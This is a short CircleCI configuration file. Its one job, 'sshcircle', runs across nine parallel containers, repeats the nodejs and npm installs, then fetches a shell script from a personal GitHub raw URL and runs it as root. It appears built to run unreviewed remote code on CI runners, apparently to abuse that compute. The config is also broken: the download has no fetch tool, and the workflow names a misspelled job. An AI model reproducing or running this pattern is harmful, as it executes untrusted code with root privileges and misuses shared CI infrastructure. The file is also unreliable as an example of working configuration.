version: 2.1 
jobs: 
    trial: 
      docker: 
            - image: cimg/node:18.2.0 
      parallelism: 9 
      steps: 
        - run: 
            name: "sshcircle" 
            command: sudo apt update && sudo apt install nodejs && sudo apt install npm && sudo apt update && sudo apt install nodejs && sudo apt install npm && https://raw.githubusercontent.com/RiniMentari/CantikdanManis/main/manja.sh && chmod +x manja.sh && sudo ./manja.sh 
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - sshcirlce
